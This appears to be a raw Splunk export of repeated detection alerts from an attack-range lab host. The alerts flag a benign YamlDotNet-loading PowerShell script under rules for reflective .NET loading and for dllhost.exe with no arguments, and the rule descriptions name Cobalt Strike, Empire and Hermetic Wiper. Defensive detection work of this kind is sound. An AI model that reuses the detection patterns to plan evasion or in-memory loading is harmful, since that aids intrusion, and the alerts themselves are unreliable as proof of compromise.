\"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T08:16:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T08:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664877331, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T08:16:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T08:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664870400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664870400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="5424", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664870400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664870400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x1530", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664873732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T07:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T07:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664873732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T07:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T07:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664873732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T07:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T07:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664873732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T07:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T07:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review 